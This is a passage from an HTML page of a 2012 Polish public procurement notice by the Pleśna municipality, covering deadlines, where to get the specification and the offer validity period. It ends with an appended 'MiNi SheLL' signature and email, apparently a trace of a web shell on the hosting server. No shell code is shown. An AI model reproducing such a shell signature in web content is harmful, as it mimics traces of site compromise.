z jakichkolwiek innych przyczyn niezależnych od wykonawcy np. rezygnacji. 

W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania  jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.plesna.pl/przetargi.htm; lub www.malopolska.pl/bip/plesna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 33-171 Pleśna 240, Urzad Gminy Pleśna, pok. nr14, bezpłatnie; w godzinach pracy Urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie zamawiającego, Urząd Gminy Pleśna, 33-171 Pleśna 240, pokój nr 9 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com